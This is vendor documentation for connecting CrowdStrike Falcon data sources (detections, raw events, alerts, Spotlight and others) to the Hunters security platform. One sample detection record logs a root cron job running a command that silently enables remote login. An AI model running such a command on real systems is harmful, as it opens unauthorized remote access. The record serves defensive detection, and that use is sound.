CrowdStrike

Self Service Ingestion

Connect this data source on your own, using the Hunters platform.

TL;DR

Supported data types

3rd party detection

Hunters detection

IOC search

Search

Table name

Log format

Collection method

CrowdStrike Raw Events

crowdstrike_raw_events

NDJSON

CrowdStrike Store

CrowdStrike Detections

crowdstrike_detects

NDJSON

CrowdStrike Store

CrowdStrike Devices

crowdstrike_devices

NDJSON

CrowdStrike Store

CrowdStrike Incidents

crowdstrike_incidents

NDJSON

CrowdStrike Store

CrowdStrike Identity Based Alerts

crowdstrike_idp

NDJSON

API

CrowdStrike Mobile

crowdstrike_mobile

NDJSON

API

CrowdStrike Spotlight

crowdstrike_spotlight

NDJSON

API

CrowdStrike Indicators

crowdstrike_indicators

NDJSON

API

CrowdStrike FileVantage

crowdstrike_filevantage_queries_changes

NDJSON

API

CrowdStrike Falcon Event Streams

crowdstrike_falcon_event_streams

NDJSON

CrowdStrike Store

CrowdStrike Alerts

crowdstrike_alerts

NDJSON

API


Overview

imageCrowdStrike is a cybersecurity company that provides endpoint security, threat intelligence, and cyber attack response services. Its flagship product, CrowdStrike Falcon, is a cloud-based endpoint protection platform that uses artificial intelligence and machine learning to detect and prevent cyber threats in real-time.

📘 Note

The following modules are needed for data collection:

  • Detections - requires Insight module.

  • Spotlight - requires Spotlight module.

  • Raw telemetry - requires Falcon Data Replicator.

Supported data types

⚠️Attention

If you have several CrowdStrike customer IDs under one parent ID, it is crucial to set up a separate data flow for each customer ID and to avoid using the parent ID when setting up the connection on Hunters.

CrowdStrike Raw Events

Overview

Table name: crowdstrike_raw_events

CrowdStrike raw events represent the detailed data captured by the Falcon sensor installed on each endpoint. These events encompass a wide range of activities.

Send data to Hunters

Step 1: Connect Hunters to your CrowdStrike portal

  1. Log into the CrowdStrike Falcon portal.

  2. From the left-side menu, click CrowdStrike Store > All Apps.
    17b6297-cs2

  3. Look for the Hunters.AI tile and click to open it.
    image 23

  4. Click Try it free.

    📘 Note
    1. Your CrowdStrike API token will be shared with Hunters with the following permissions:

      • CrowdStrike Falcon raw data replicator
      • CrowdStrike Detections API
    2. You will receive an automated email from Hunters confirming this action. This is designed for new prospects who have not yet been introduced to Hunters.

  5. To retrieve your Customer ID, open the Falcon menu and navigate to Host setup and management > Sensor downloads.
    image 25

  6. Copy your Customer ID and paste it into a safe place.
    image 26

Step 2: Create a data source on Hunters

  1. Follow this procedure to connect CrowdStrike as a data source.
  2. Insert the Customer ID value from the previous section and click Apply.
📘Note

The Customer ID field is case-sensitive.

02610f3-2023-04-16_12-31-02

Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.

CrowdStrike Detections

Overview

Table name: crowdstrike_detects

CrowdStrike detections are generated by analyzing events collected from endpoints across the network. These detections are based on a wide range of indicators and sophisticated analysis techniques, including machine learning, behavioral analysis, and threat intelligence. CrowdStrike's Falcon platform is known for its ability to detect a variety of threats, from malware and ransomware to more subtle indicators of attack (IOAs) and indicators of compromise (IOCs).

Send data to Hunters

Step 1: Connect Hunters to your CrowdStrike portal

  1. Log into the CrowdStrike Falcon portal.

  2. From the left-side menu, click CrowdStrike Store > All Apps.
    17b6297-cs2

  3. Look for the Hunters.AI tile and click to open it.
    image 23

  4. Click Try it free.

    📘 Note
    1. Your CrowdStrike API token will be shared with Hunters with the following permissions:

      • CrowdStrike Falcon raw data replicator
      • CrowdStrike Detections API
    2. You will receive an automated email from Hunters confirming this action. This is designed for new prospects who have not yet been introduced to Hunters.

  5. To retrieve your Customer ID, open the Falcon menu and navigate to Host setup and management > Sensor downloads.
    image 25

  6. Copy your Customer ID and paste it into a safe place.
    image 26

Step 2: Create a data source on Hunters

  1. Follow this procedure to connect CrowdStrike as a data source.
  2. Insert the Customer ID value from the previous section and click Apply.
📘Note

The Customer ID field is case-sensitive.

02610f3-2023-04-16_12-31-02

Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.

CrowdStrike Devices

Overview

Table name: crowdstrike_devices

CrowdStrike device logs encompass a wide range of data points collected from each endpoint or device within the network. These logs are crucial for monitoring the health and security status of the network, detecting potential threats, and facilitating forensic analysis in the event of a security incident.

Send data to Hunters

Step 1: Connect Hunters to your CrowdStrike portal

  1. Log into the CrowdStrike Falcon portal.

  2. From the left-side menu, click CrowdStrike Store > All Apps.
    17b6297-cs2

  3. Look for the Hunters.AI tile and click to open it.
    image 23

  4. Click Try it free.

    📘 Note
    1. Your CrowdStrike API token will be shared with Hunters with the following permissions:

      • CrowdStrike Falcon raw data replicator
      • CrowdStrike Detections API
    2. You will receive an automated email from Hunters confirming this action. This is designed for new prospects who have not yet been introduced to Hunters.

  5. To retrieve your Customer ID, open the Falcon menu and navigate to Host setup and management > Sensor downloads.
    image 25

  6. Copy your Customer ID and paste it into a safe place.
    image 26

Step 2: Create a data source on Hunters

  1. Follow this procedure to connect CrowdStrike as a data source.
  2. Insert the Customer ID value from the previous section and click Apply.
📘Note

The Customer ID field is case-sensitive.

02610f3-2023-04-16_12-31-02

Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.

CrowdStrike Incidents

Overview

Table name: crowdstrike_incidents

CrowdStrike Incidents are part of CrowdStrike Falcon's comprehensive suite of endpoint protection capabilities, focusing on identifying, managing, and resolving security threats across an organization's network. When the Falcon platform detects a series of related security events or behaviors that indicate a more significant issue or attack, it aggregates this information into an incident. This approach helps security teams prioritize and respond to the most critical threats more efficiently, ensuring that resources are focused where they are needed most.

Send data to Hunters

Step 1: Connect Hunters to your CrowdStrike portal

  1. Log into the CrowdStrike Falcon portal.

  2. From the left-side menu, click CrowdStrike Store > All Apps.
    17b6297-cs2

  3. Look for the Hunters.AI tile and click to open it.
    image 23

  4. Click Try it free.

    📘 Note
    1. Your CrowdStrike API token will be shared with Hunters with the following permissions:

      • CrowdStrike Falcon raw data replicator
      • CrowdStrike Detections API
    2. You will receive an automated email from Hunters confirming this action. This is designed for new prospects who have not yet been introduced to Hunters.

  5. To retrieve your Customer ID, open the Falcon menu and navigate to Host setup and management > Sensor downloads.
    image 25

  6. Copy your Customer ID and paste it into a safe place.
    image 26

Step 2: Create a data source on Hunters

  1. Follow this procedure to connect CrowdStrike as a data source.
  2. Insert the Customer ID value from the previous section and click Apply.
📘Note

The Customer ID field is case-sensitive.

02610f3-2023-04-16_12-31-02

Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.

CrowdStrike Identity Based Alerts

Overview

Table name: crowdstrike_idp

CrowdStrike's identity-based alerts are part of its advanced threat detection capabilities, focusing on identifying security threats that specifically target or involve user identities and credentials. These alerts play a critical role in an organization's security posture by helping to prevent unauthorized access, insider threats, and identity-related attacks. With the increasing sophistication of cyber threats, particularly those involving credential theft, social engineering, and lateral movement within networks, identity-based security solutions have become essential.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).


image.png

Step 1: Create an API client

Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here).

Step 2: Create a data source on Hunters

Complete the process on the Hunters platform, and supply the following keys following this process:

  • Client ID
  • Client Secret
  • Cloud Endpoint - This should only contain the domain name, without the https:// prefix. For example: api.crowdstrike.com.

CrowdStrike Mobile

Overview

Table name: crowdstrike_mobile

Mobile logs in CrowdStrike encompass detailed records of activities, events, and security incidents on mobile devices that are protected by the CrowdStrike Falcon platform. These logs are crucial for monitoring the security posture of mobile devices, investigating incidents, and ensuring compliance with organizational security policies.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).


image.png

Step 1: Create an API client

Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here).

Step 2: Create a data source on Hunters

Complete the process on the Hunters platform, and supply the following keys following this process:

  • Client ID
  • Client Secret
  • Cloud Endpoint - This should only contain the domain name, without the https:// prefix. For example: api.crowdstrike.com.

CrowdStrike Spotlight

Overview

Table name: crowdstrike_spotlight

Spotlight logs contain detailed information about detected vulnerabilities in an organization's endpoints. These logs are essential for tracking, managing, and mitigating vulnerabilities effectively. The data includes specifics about each vulnerability, such as its severity, the affected software or system component, and recommendations for remediation.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).


image.png

Step 1: Create an API client

Create a CrowdStrike API client with the Vulnerabilities: read scope and permissions (as specified here).

Step 2: Create a data source on Hunters

Complete the process on the Hunters platform, and supply the following keys following this process:

  • Client ID
  • Client Secret
  • Cloud Endpoint - This should only contain the domain name, without the https:// prefix. For example: api.crowdstrike.com.

CrowdStrike Indicators

Overview

Table name: crowdstrike_indicators

CrowdStrike utilizes a sophisticated array of indicators within its cybersecurity framework to identify, assess, and respond to threats. These indicators are crucial for detecting malicious activities and are part of CrowdStrike's broader approach to endpoint security and threat intelligence. Understanding these indicators can help organizations better prepare for, and respond to, potential cybersecurity threats.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).


image.png

Step 1: Create an API client

Create a CrowdStrike API client with the INDICATORS (FALCON INTELLIGENCE): read scope and permissions (as specified here).

Step 2: Create a data source on Hunters

Complete the process on the Hunters platform, and supply the following keys following this process:

  • Client ID
  • Client Secret
  • Cloud Endpoint - This should only contain the domain name, without the https:// prefix. For example: api.crowdstrike.com.

CrowdStrike FileVantage

Overview

Table name: crowdstrike_filevantage_queries_changes

FileVantage is designed to track file changes, access patterns, and potential unauthorized data movement, which are critical for data loss prevention (DLP) and insider threat detection. This tool helps organizations manage and secure their sensitive data by leveraging CrowdStrike's powerful endpoint security platform.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).


image.png

Step 1: Create an API client

Create a CrowdStrike API client with the FILEVANTAGE: read scope and permissions (as specified here).

Step 2: Create a data source on Hunters

Complete the process on the Hunters platform, and supply the following keys following this process:

  • Client ID
  • Client Secret
  • Cloud Endpoint - This should only contain the domain name, without the https:// prefix. For example: api.crowdstrike.com.

CrowdStrike Falcon Event Streams

Overview

Table name: crowdstrike_falcon_event_streams

CrowdStrike Falcon Event Streams provide real-time access to rich telemetry data from endpoints protected by the Falcon platform. These event streams allow organizations to monitor and analyze security events, such as process execution, network connections, and file activities, as they happen. By leveraging this data, security teams can build custom integrations, enhance threat detection capabilities, and automate responses to potential threats.

Send data to Hunters

If you already have CrowdStrike connected

  1. On the Hunters platform, navigate to Data > Data sources.

  2. Click + Add data sources to view a list of your connected data sources.

  3. Locate CrowdStrike and click Edit Connection.

  4. Make sure the CROWDSTRIKE API tab is selected.

  5. Scroll down to the Data Types section and activate the CrowdStrike Falcon Event Streams data source.

  6. Now click Test Connection and once the test is successful, click Apply.

If this is your first time connecting CrowdStrike

Step 1: Connect Hunters to your CrowdStrike portal

  1. Log into the CrowdStrike Falcon portal.

  2. From the left-side menu, click CrowdStrike Store > All Apps.
    17b6297-cs2

  3. Look for the Hunters.AI tile and click to open it.
    image 23

  4. Click Try it free.

    📘 Note
    1. Your CrowdStrike API token will be shared with Hunters with the following permissions:

      • CrowdStrike Falcon raw data replicator
      • CrowdStrike Detections API
    2. You will receive an automated email from Hunters confirming this action. This is designed for new prospects who have not yet been introduced to Hunters.

  5. To retrieve your Customer ID, open the Falcon menu and navigate to Host setup and management > Sensor downloads.
    image 25

  6. Copy your Customer ID and paste it into a safe place.
    image 26

Step 2: Create a data source on Hunters

  1. Follow this procedure to connect CrowdStrike as a data source.
  2. Insert the Customer ID value from the previous section and click Apply.
📘Note

The Customer ID field is case-sensitive.

02610f3-2023-04-16_12-31-02

Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.

Expected format

{
  "AgentId": "afwehw34h5a235h23h52",
  "AggregateId": "aggind:afwehw34h5a235h23h52:577551784278489191",
  "CommandLine": "/usr/sbin/systemsetup -setremotelogin on",
  "CompositeId": "a872ad070d984dff884bf211fda3d2d3:ind:afwehw34h5a235h23h52:577551784277851241-41009-3969400",
  "DataDomains": "Endpoint",
  "Description": "A process triggered an informational severity custom rule.",
  "FalconHostLink": "https://falcon.crowdstrike.com/activity-v2/detections/a872ad070d984dff884bf211fda3d2d3:ind:afwehw34h5a235h23h52:577551784277851241-41009-3969400?_cid=afwh35rw3h3hwh3",
  "FileName": "systemsetup",
  "FilePath": "/usr/sbin/systemsetup",
  "FilesAccessed": [
    {
      "FileName": "systemsetup",
      "FilePath": "/usr/sbin/",
      "Timestamp": 1727004600
    },
    {
      "FileName": "fawegweg",
      "FilePath": "/dev/",
      "Timestamp": 1727004600
    },
    {
      "FileName": "pass",
      "FilePath": "/private/etc/",
      "Timestamp": 1727004600
    },
    {
      "FileName": ".fawefgawaw",
      "FilePath": "/private/var/root/",
      "Timestamp": 1727004600
    },
    {
      "FileName": "dtracehelper",
      "FilePath": "/dev/",
      "Timestamp": 1727004600
    }
  ],
  "GrandParentCommandLine": "/usr/sbin/cron",
  "GrandParentImageFileName": "cron",
  "GrandParentImageFilePath": "/usr/sbin/cron",
  "HostGroups": "2b5993dc70a249b3956e31e4c936f599,c1d473c1c8d546ea87c35f4c02bdf0b2,e452e9983a9f4939abd3e9612b1480ba",
  "Hostname": "ASDHA4356HSWE",
  "IOARuleGroupName": "macOS Custom Detections",
  "IOARuleInstanceID": "73",
  "IOARuleInstanceVersion": 3,
  "IOARuleName": "Remote services. Remote login enabled",
  "LocalIP": "169.254.254.200",
  "LocalIPv6": "",
  "LogonDomain": "",
  "MACAddress": "aa-bb-cc-dd-ee-df",
  "MD5String": "bc91819b3a077dca8ba4054f1c8562ca",
  "Name": "Suspicious Activity",
  "Objective": "Falcon Detection Method",
  "ParentCommandLine": "/bin/sh -c /usr/sbin/systemsetup -setremotelogin on &> /dev/null",
  "ParentImageFileName": "bash",
  "ParentImageFilePath": "/bin/bash",
  "ParentProcessId": 577551784277851239,
  "PatternDispositionDescription": "Detection, standard detection.",
  "PatternDispositionFlags": {
    "BlockingUnsupportedOrDisabled": false,
    "BootupSafeguardEnabled": false,
    "CriticalProcessDisabled": false,
    "Detect": false,
    "FsOperationBlocked": false,
    "HandleOperationDowngraded": false,
    "InddetMask": false,
    "Indicator": false,
    "KillActionFailed": false,
    "KillParent": false,
    "KillProcess": false,
    "KillSubProcess": false,
    "OperationBlocked": false,
    "PolicyDisabled": false,
    "ProcessBlocked": false,
    "QuarantineFile": false,
    "QuarantineMachine": false,
    "RegistryOperationBlocked": false,
    "Rooting": false,
    "SensorOnly": false,
    "SuspendParent": false,
    "SuspendProcess": false
  },
  "PatternDispositionValue": 0,
  "PatternId": 41009,
  "ProcessEndTime": 0,
  "ProcessId": 577551784277851241,
  "ProcessStartTime": 1727004600,
  "SHA1String": "0000000000000000000000000000000000000000",
  "SHA256String": "0467c233807480601368edac622e93c060ef7b3fcd444c0786956a7f1facb505",
  "Severity": 10,
  "SeverityName": "Informational",
  "SourceProducts": "Falcon Insight",
  "SourceVendors": "CrowdStrike",
  "Tactic": "Custom Intelligence",
  "Technique": "Indicator of Attack",
  "Type": "ldt",
  "UserName": "root"
}

CrowdStrike Alerts

Overview

Table name: crowdstrike_alerts

The CrowdStrike Alerts API provides programmatic access to security alerts generated by the Falcon platform. It allows users to retrieve, filter, and manage alert data across their environment, enabling seamless integration with SIEMs, SOAR platforms, or custom security workflows. With this API, organizations can automate incident response, monitor real-time threats, and enhance visibility into potential security incidents, all while maintaining tight control over alert data.

Send data to Hunters

⚠️ Attention

The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).


image.png

Step 1: Create an API client

Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here).

Step 2: Create a data source on Hunters

Complete the process on the Hunters platform, and supply the following keys following this process:

  • Client ID
  • Client Secret
  • Cloud Endpoint - This should only contain the domain name, without the https:// prefix. For example: api.crowdstrike.com.